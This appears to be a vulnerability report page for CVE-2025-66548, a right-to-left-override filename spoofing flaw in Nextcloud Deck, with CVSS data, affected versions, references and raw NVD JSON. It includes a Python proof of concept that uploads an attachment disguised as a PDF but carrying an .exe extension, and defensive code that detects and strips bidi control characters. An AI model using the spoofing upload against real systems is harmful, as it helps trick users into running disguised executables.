Security Vulnerability Report
CVE-2025-66548
CVSS 3.3 LOW (CNA, secondary score) / 5.5 MEDIUM (NVD, primary score)

Published: 2025-12-05 18:15:58
Last Modified: 2025-12-09 19:01:55

Description

Nextcloud Deck is a kanban-style organization tool aimed at personal planning and project organization for teams, integrated with Nextcloud. Prior to 1.12.7, 1.14.4, and 1.15.1, the displayed file extension can be spoofed with RTLO (Unicode right-to-left override, U+202E) characters, tricking users into downloading files with a different extension than the one displayed. This vulnerability is fixed in 1.12.7, 1.14.4, and 1.15.1.

CVSS Details

Two CVSS v3.1 assessments exist for this CVE (both appear in the raw JSON below); the badge at the top of this page uses the lower, secondary one.

CVSS Score
3.3 (secondary, CNA) / 5.5 (primary, NVD)
Severity
LOW (secondary, CNA) / MEDIUM (primary, NVD)
CVSS Vector (secondary, CNA)
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N (local, low privileges, no user interaction, low integrity impact)
CVSS Vector (primary, NVD)
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N (local, no privileges, user interaction required, high confidentiality impact)
Weakness
CWE-116 (Improper Encoding or Escaping of Output)

Configurations (Affected Products)

cpe:2.3:a:nextcloud:deck:*:*:*:*:*:*:*:* - VULNERABLE: Nextcloud Deck < 1.12.7
cpe:2.3:a:nextcloud:deck:*:*:*:*:*:*:*:* - VULNERABLE: Nextcloud Deck >= 1.14.0, < 1.14.4
cpe:2.3:a:nextcloud:deck:*:*:*:*:*:*:*:* - VULNERABLE: Nextcloud Deck >= 1.15.0, < 1.15.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-66548 PoC - File Extension Spoofing in Nextcloud Deck
# RTLO character: U+202E (RIGHT-TO-LEFT OVERRIDE). Everything after it is
# rendered right-to-left, so the visual order of the trailing characters is
# reversed while the stored string (and therefore the real extension) is
# unchanged.

RTLO = '\u202e'


def create_spoofed_filename():
    """
    Generate a spoofed filename using the RTLO character.

    Stored name:  'document_' + RTLO + 'fdp.exe'   (real extension: .exe)
    Rendered as:  'document_exe.pdf'               (looks like a PDF)

    The trick is to place the *visual* extension, reversed, right after the
    override and to end the string with the real extension.
    """
    return f'document_{RTLO}fdp.exe'


def exploit_nextcloud_deck(base_url, session_cookie):
    """
    Upload an attachment whose name abuses RTLO in Nextcloud Deck.

    Args:
        base_url: Nextcloud instance URL
        session_cookie: Valid session cookie for authentication

    Returns:
        bool: True if upload successful, False otherwise

    NOTE: the cookie name, headers, form field and upload path below are taken
    from this page as-is and are not verified against the Deck API
    documentation; check them (and any CSRF/OCS headers your instance
    requires) before use.
    """
    headers = {
        'Cookie': f'nc_session={session_cookie}',
        'X-Requested-With': 'XMLHttpRequest',
    }
    spoofed_filename = create_spoofed_filename()

    # Placeholder "executable" payload: a bare MZ magic followed by padding.
    malicious_content = b'MZ' + b'\x00' * 100

    files = {
        'files[]': (spoofed_filename, malicious_content, 'application/octet-stream')
    }
    upload_url = f'{base_url}/apps/deck/api/v1.0/attachments'

    try:
        response = requests.post(
            upload_url,
            headers=headers,
            files=files,
            verify=False,  # lab instances with self-signed certificates only
        )
        if response.status_code == 200:
            print(f'[+] Successfully uploaded: {spoofed_filename!r}')
            print('[+] Users will see:  document_exe.pdf')
            print('[-] Actual file:     document_<RTLO>fdp.exe (extension .exe)')
            return True
        print(f'[-] Upload failed: {response.status_code}')
        return False
    except requests.RequestException as e:
        print(f'[-] Error: {e}')
        return False


if __name__ == '__main__':
    # Replace with actual values
    BASE_URL = 'https://nextcloud.example.com'
    SESSION_COOKIE = 'your-session-cookie-here'

    print('CVE-2025-66548 - Nextcloud Deck RTLO File Spoofing')
    print('=' * 50)
    exploit_nextcloud_deck(BASE_URL, SESSION_COOKIE)
```
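Deck's own fix is the commit linked under References; the block below is an added example written for this page, not Deck's code or that patch. It shows, in Python, the two halves of the problem the description names: how a filename carrying U+202E is read by a user versus what extension the stored name really has, and a server-side check that either rejects bidi control characters outright or strips every Unicode format character before the name is persisted. The sample filenames are constructed for the example; the rendering function is a deliberate simplification of the Unicode bidi algorithm that is accurate for the Latin/digit/punctuation runs an attacker uses.

```python
import unicodedata

RTLO = '\u202e'  # RIGHT-TO-LEFT OVERRIDE
PDF = '\u202c'   # POP DIRECTIONAL FORMATTING (ends an override)

# Unicode bidi controls that can reorder displayed text: embeddings and
# overrides U+202A..U+202E, isolates U+2066..U+2069, and the marks U+200E/U+200F.
BIDI_CONTROLS = frozenset(
    chr(cp) for cp in (*range(0x202A, 0x202F), *range(0x2066, 0x206A), 0x200E, 0x200F)
)


def has_bidi_controls(name: str) -> bool:
    """True if the stored filename contains any bidi control character."""
    return any(ch in BIDI_CONTROLS for ch in name)


def rendered_name(name: str) -> str:
    """Approximate what a user sees for a name carrying one RTLO override.

    Text after U+202E is drawn right-to-left until U+202C (or end of string),
    so that span appears reversed; the control characters themselves are
    invisible. Simplified bidi model, sufficient for Latin/digit/punctuation.
    """
    if RTLO not in name:
        return ''.join(ch for ch in name if ch not in BIDI_CONTROLS)
    head, _, tail = name.partition(RTLO)
    overridden, _, rest = tail.partition(PDF)
    return head + overridden[::-1] + rest


def real_extension(name: str) -> str:
    """Extension the OS actually uses: text after the last '.' of the stored string."""
    _, dot, ext = name.rpartition('.')
    return ext.lower() if dot else ''


def displayed_extension(name: str) -> str:
    """Extension the user believes the file has, based on the rendered name."""
    return real_extension(rendered_name(name))


def extension_mismatch(name: str) -> bool:
    """Detection rule: the name a user reads ends in a different extension than the stored name."""
    return has_bidi_controls(name) and displayed_extension(name) != real_extension(name)


def sanitize_filename(name: str) -> str:
    """Repairing variant: drop every Unicode format character (category Cf),
    which covers all bidi controls plus zero-width spaces/joiners, then strip
    leading/trailing blanks and dots so the extension cannot be hidden."""
    cleaned = ''.join(ch for ch in name if unicodedata.category(ch) != 'Cf')
    return cleaned.strip(' .')


def validate_filename(name: str) -> str:
    """Strict variant: reject instead of repairing, so the client learns why."""
    if has_bidi_controls(name):
        raise ValueError('filename contains Unicode bidi control characters')
    return name


# Constructed sample filenames (not taken from any real upload).
SAMPLES = [
    'report.pdf',                    # benign
    f'document_{RTLO}fdp.exe',       # classic RTLO: shown as document_exe.pdf
    f'invoice{RTLO}gpj.scr',         # shown as invoicercs.jpg
    f'photo{RTLO}gnp.js{PDF}.txt',   # override closed by PDF: extensions agree, still rejected
    'notes\u200b.txt',               # zero-width space: not bidi, but stripped by sanitizer
]

if __name__ == '__main__':
    for s in SAMPLES:
        print(f'stored={s!r:32} shown={rendered_name(s)!r:22} '
              f'real_ext={real_extension(s)!r:6} mismatch={extension_mismatch(s)!s:5} '
              f'sanitized={sanitize_filename(s)!r}')
```

Stripping category Cf also removes zero-width joiners used in emoji sequences, so a service that shows names back to users may prefer `validate_filename` (reject with a clear error) over silent repair; either way the check has to run on the server, because the client that renders the name is the one being deceived.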

References

https://github.com/nextcloud/deck/commit/afa95d3c507465b9d31af7c88c69b76711ef185a (Patch)
https://github.com/nextcloud/deck/pull/6671 (Issue Tracking)
https://github.com/nextcloud/security-advisories/security/advisories/GHSA-xjvq-xvr7-xpg6 (Patch, Vendor Advisory)
https://hackerone.com/reports/2326618 (Permissions Required, Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-66548",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-05T18:15:57.967",
    "lastModified": "2025-12-09T19:01:55.210",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Nextcloud Deck is a kanban style organization tool aimed at personal planning and project organization for teams integrated with Nextcloud. Prior to 1.12.7, 1.14.4, and 1.15.1, file extension can be spoofed by using RTLO characters, tricking users into download files with a different extension than what is displayed. This vulnerability is fixed in 1.12.7, 1.14.4, and 1.15.1."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 3.3,
            "baseSeverity": "LOW",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 1.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-116"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:nextcloud:deck:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.12.7",
                "matchCriteriaId": "3CB27832-7EB0-4F3C-9D22-26F111728249"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:nextcloud:deck:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "1.14.0",
                "versionEndExcluding": "1.14.4",
                "matchCriteriaId": "F630A529-C2EA-4308-AB37-D0A7424D4B46"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:nextcloud:deck:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "1.15.0",
                "versionEndExcluding": "1.15.1",
                "matchCriteriaId": "2B268E3B-B298-4A04-94E5-745CE0AD33C5"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/nextcloud/deck/commit/afa95d3c507465b9d31af7c88c69b76711ef185a",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/nextcloud/deck/pull/6671",
        "source": "[email protected]",
        "tags": ["Issue Tracking"]
      },
      {
        "url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-xjvq-xvr7-xpg6",
        "source": "[email protected]",
        "tags": ["Patch", "Vendor Advisory"]
      },
      {
        "url": "https://hackerone.com/reports/2326618",
        "source": "[email protected]",
        "tags": ["Permissions Required", "Vendor Advisory"]
      }
    ]
  }
}
```